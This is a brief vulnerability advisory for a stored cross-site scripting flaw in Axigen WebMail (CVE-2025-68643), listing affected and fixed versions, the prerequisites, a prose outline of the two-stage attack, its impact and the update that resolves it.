Axigen WebMail Stored XSS Vulnerability (CVE-2025-68643) Key Information Vulnerability Type: Cross Site Scripting (XSS) Affected Component: Axigen WebMail Affected Versions: - Axigen 10.3.x, 10.4.x, 10.5.x up to 10.5.56 (fixed with 10.5.57) - Axigen 10.6.x up to 10.6.25 (fixed with 10.6.26) Prerequisites: The attacker must first compromise the account preference by exploiting a separate vulnerability or using compromised credentials (multi-stage attack). Description: - The account preference parameter is not sanitized by Axigen WebMail when loaded from storage. - Attack follows two stages: 1. Initial Compromise: Modify the account preference to a malicious payload. 2. Payload Execution: Injected payload can redirect resource loading to an attacker-controlled server, enabling malicious JavaScript execution. Impact: Credential theft, session hijacking, and data exfiltration. Solution: Update from the WebAdmin.